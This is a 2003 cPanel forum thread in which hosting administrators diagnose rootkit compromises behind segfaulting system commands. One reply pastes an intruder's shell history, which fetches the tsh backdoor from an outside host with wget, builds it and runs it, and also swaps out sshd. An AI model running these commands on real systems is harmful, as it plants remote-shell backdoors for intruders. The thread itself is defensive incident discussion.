The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

ls segmentation fault

Discussion in 'General Discussion' started by mitul, Feb 27, 2003.

  1. mitul

    mitul Well-Known Member

    Joined:
    Feb 8, 2003
    Messages:
    291
    Likes Received:
    0
    Trophy Points:
    16
    Hello All,



    I get "Segmentation Fault (Core Dumped)" when i execute "ls" command.
    I re-installed fileutils from the panel and it Installed fileutils-4.1-10.1.

    Then ls worked for me but after sometime it again fired the same error.

    When i again re-installed fileutils it works for some time let's say 5 to 7 attempts i.e I can execute ls for 5 to 7 times and it works , but again the same problem.

    This is has been a repeating prob for me, Any help would be Appreciated.

    Help me Pls.

    Thank you in Advanced.

    I am on Redhat 7.3 and WHM/cPanel 6.0

    Regards,








    :confused: :confused: :confused: :confused: :( ;) :p :mad: :confused: :confused:
     
  2. infinityws

    infinityws Well-Known Member

    Joined:
    Feb 20, 2003
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    16
    I got the same problem. Anyone got a fix?
     
  3. vishal

    vishal Well-Known Member

    Joined:
    Jan 28, 2003
    Messages:
    340
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    India
    HMMmmmm... Serious

    Hello,

    This is a very serious problem!!! It simply means that ur server has been compromised somehow. ( I may be wrong!!!). But i am 90% sure it has been compromised.

    get chkrootkit and see the results (be careful if it says that 'bindshell: INFECTED' (don't worry)

    check the port and the service running on that port (might be portmap or portsentry) . if the only output from chkrootkit is 'bindshell : infected' then u might be safe.

    check throughly the whole server!!!!

    Be careful !!!!

    Regards,

    :D
     
  4. Website Rob

    Website Rob Well-Known Member

    Joined:
    Mar 23, 2002
    Messages:
    1,506
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    Alberta, Canada
    cPanel Access Level:
    Root Administrator
    I would suggest you take the Server offline -- now.

    I too, strongly believe your Server has been cracked. You can further verify by running 'netstat' -- if not found or also does a 'core dump' it's safe to say you have been hacked. The "Core Dump" msg. will appear on regular basis for certain commands, like; netstat, ps, top, df. Crackers use this command to remove traces of what they have been doing, although, they know the command to prevent it, because they've set it up that way.

    It's a bummer and a big PITA, but there is no way around being absolutely sure, all traces have been removed, until the hard drive is re-formatted or looked at by someone experienced in this area. Every day you wait, you are giving someone else access to your Server to do... who knows what.


    Just noticed the date of the first post. :rolleyes:
    Although this information is probably no good to them now, hopefully it will help others in the future -- whenever they see that dreaded msg: Core Dump, and wonder what it means.
     
    #4 Website Rob, Apr 18, 2003
    Last edited: Apr 18, 2003
  5. infinityws

    infinityws Well-Known Member

    Joined:
    Feb 20, 2003
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    16
    Yeah I was hacked. i'm beginning to hate Cpanel. Nothing but exploits and issues.

    and yeah i was totally up to date on all software
     
  6. vishal

    vishal Well-Known Member

    Joined:
    Jan 28, 2003
    Messages:
    340
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    India
    what exploited you ???

    Hello,

    How did u come to know that u r hacked? is it a rootkit ??

    Check this out??
    http://www.soohrt.org
    may be it will help u!!! :)


    Let me know if u have any major probs may be i can help out!!!!

    ( i had been a victim )

    Regards,
     
  7. sexy_guy

    sexy_guy Well-Known Member

    Joined:
    Mar 19, 2003
    Messages:
    848
    Likes Received:
    0
    Trophy Points:
    16
    Well i get core dump messages usually after the completion of /scripts/easyapache/ unless i restart apache /etc/rc.d/init.d/httpd restart. I suspect that because the final part of the installation attempts to restart apache but that doesnt work properly so unless you start apache manually immediately of the rebuild you will see segmentation and core dump error msgs. Pages of it. But i do not get these msgs with ls top netstat etc.

    [Mon Apr 14 03:43:38 2003] [notice] child pid 10154 exit signal Segmentation fault (11)
    [Mon Apr 14 03:43:39 2003] [notice] child pid 20098 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
    [Mon Apr 14 03:43:39 2003] [notice] child pid 10155 exit signal Segmentation fault (11)
    [Mon Apr 14 03:43:40 2003] [notice] child pid 20233 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
    [Mon Apr 14 03:43:40 2003] [notice] child pid 20232 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
    [Mon Apr 14 03:43:42 2003] [notice] child pid 20374 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
    [Mon Apr 14 03:43:42 2003] [notice] child pid 26474 exit signal Segmentation fault (11)
     
  8. Radio_Head

    Radio_Head Well-Known Member

    Joined:
    Feb 15, 2002
    Messages:
    2,051
    Likes Received:
    1
    Trophy Points:
    38
    was you providing a Cpanel demo on yoru site ? If yes it was BAD ..
    was you providing SSH ? If yes it was BAD ..
    was php safe mode off ? If yes it was BAD ..
     
  9. infinityws

    infinityws Well-Known Member

    Joined:
    Feb 20, 2003
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    16

    No Demo
    SSH was activated on some accounts
    whatever the default is for php safe mode that is what it is set to.

    Anyhow the only accounts on the site were mine with a few SSH access.
     
  10. rnh

    rnh Well-Known Member

    Joined:
    Apr 15, 2003
    Messages:
    118
    Likes Received:
    0
    Trophy Points:
    16
    As long as you have secure passwords (IE "E5d982kjhsGkjh9" as opposed to "password") the SSH shouldn't be a problem since you're the only person with access to the server.

    However there are a few PHP scripts out there that have had vulnerabilities over the years so if you're using some outdated PHP scripts of some sort that could cause problems, especcially if you have php safe mode off (Cpanel's default)

    If you don't know how they got in, you might want to do a grep through the PHP files for functions like "readfile", "passthrough", "fopen", "fwrite" and "fread" and other functions like that that could be used to access other files on your server if you do not know all of the PHP scripts that you have installed.

    CGI files have been used to exploit servers as well with scripts that did not check user input and wrote to files and the user's input was changed to use the CGI files to write to passwd files to change passwords and add users and other things like that that they can do to gain access.

    Also did you have Anonymous FTP enabled?

    Otherwise it was probably just a vulnerability in some program, but cPanel seems to keep pretty up2date on patches and whatnot so I can't imagine that cPanel servers get r00ted that often on common software vulnerabilities.
     
  11. infinityws

    infinityws Well-Known Member

    Joined:
    Feb 20, 2003
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    16
    Well, about 2 weeks before today I went through all accounts and turned off anonymous FTP, as no one needed it.

    But I believe they got in through the ptrace exploit. Apparently, .20 kernel upgrade doesn't give you any info as to wether the other patches were applied, so I had no idea. But I learn from my mistakes and i'll be sure to triple check that all patches have been installed.

    But I've read of many cpanel exploits, its just my first time with a server using cpanel and in less than a month its been compromised. Never happened before.
     
  12. parhelic

    parhelic Well-Known Member

    Joined:
    Oct 27, 2002
    Messages:
    47
    Likes Received:
    0
    Trophy Points:
    6
  13. rnh

    rnh Well-Known Member

    Joined:
    Apr 15, 2003
    Messages:
    118
    Likes Received:
    0
    Trophy Points:
    16
    Man... sorry to hear about your misfortune.

    Was this done from a remote server and not by SSH enabled users on your own server?

    Man, glad I switched to FreeBSD... atleast for now I am...

    What version of Linux were you running? Was it up to date?
     
    #13 rnh, Apr 19, 2003
    Last edited: Apr 19, 2003
  14. rnh

    rnh Well-Known Member

    Joined:
    Apr 15, 2003
    Messages:
    118
    Likes Received:
    0
    Trophy Points:
    16
    I take that back... looking at that file again the person has to have SSH access initially in order to execute that file, which opens port 60000 for them to access with elevated priveldges...

    Did the script bypass a firewall closing off all unused ports or did you not have a firewall?
     
  15. parhelic

    parhelic Well-Known Member

    Joined:
    Oct 27, 2002
    Messages:
    47
    Likes Received:
    0
    Trophy Points:
    6
    It probably was a local user, and its been a nightmare for the past week trying to clean this mofo out. Here's some of what he did from .bash_history once he rooted us:

    941 wget ftp://rt.fm/pub/OpenBSD/OpenSSH/portable/openssh-3.6.1p1.tar.gz
    942 tar zxvf openssh-3.6.1p1.tar.gz
    943 cd openssh-3.6.1p1
    944 ls
    945 ./configure --prefix=/usr --sysconfdir=/etc/ssh/ --with-tcp-wrappers
    946 make
    947 ls
    948 rm /usr/sbin/sshd
    949 make install
    950 cd ..
    951 ls
    952 wget http://www.cr0.net:8040/code/network/tsh-0.52.tar.gz
    953 wget http://www.cr0.net:8040/code/network/tsh-0.42.tar.gz
    954 ls
    955 rm tsh-0.52.tar.gz
    956 tar zxvf tsh-0.42.tar.gz
    957 cd tsh-0.42
    958 ls
    959 make linux
    960 ls
    961 ./tshd

    This is what happened last night, previously in the week we thought we had him taken care of, we blocked his subnet at our router, we removed his Ambient's rootkit (ARK), removed his /home/user accounts and his entries in /etc/passwd, /etc/shadow, and /etc/group. Following that we edited /etc/passwd and switched everyone on all of our servers from/bin/bash to /usr/local/cpanel/bin/jailshell, we removed all of the /root/.ssh keys as well. Apparently we didnt clean him out completely

    All of the servers which were hacked were running latest build of Cpanel, they were all completely up2date, running Redhat 8.0 with latest stable kernel 2.4.18-27.8.0.

    *sigh*
     
  16. rnh

    rnh Well-Known Member

    Joined:
    Apr 15, 2003
    Messages:
    118
    Likes Received:
    0
    Trophy Points:
    16
    does Cpanel have a way to prevent users from compiling?

    In Ensim noone could compile unless you gave them a "development tools package"

    does he keep getting access to the same server? I dunno much about KLMs, but isn't Cpanel supposed to check MD5s and stuff like that to look for dirty binaries?
     
  17. FWC

    FWC Well-Known Member

    Joined:
    May 13, 2002
    Messages:
    354
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Ontario, Canada
    The brute force way is to chmod the c compilers. Run:

    chmod 000 /usr/bin/*cc*

    Then when you need to compile Apache or something else you can do:

    chmod 700 /usr/bin/*cc*

    and switch it back when you are done.
     
  18. shaun

    shaun Well-Known Member

    Joined:
    Nov 9, 2001
    Messages:
    698
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    San Clemente, Ca
    Users do have access to compile by default. The OS by default gives users this ability. You could chmod 750 (or 700) your compilers. I wouldnt 000 them.

    If you run in a jail'd env they still have access to these compilers BUT they dont have alot of the librarys needed to compile exploits (Good Thinking Nick :) ).
     
  19. FWC

    FWC Well-Known Member

    Joined:
    May 13, 2002
    Messages:
    354
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Ontario, Canada
    Good point. If 700 isn't good enough you've already got some serious trouble. :eek:
     
  20. infinityws

    infinityws Well-Known Member

    Joined:
    Feb 20, 2003
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    16
    If you block port 22, can root still gain access thru ssh? If not how does root compile, or control things?

    What about SFTP? Does that still work?
     
Loading...

Share This Page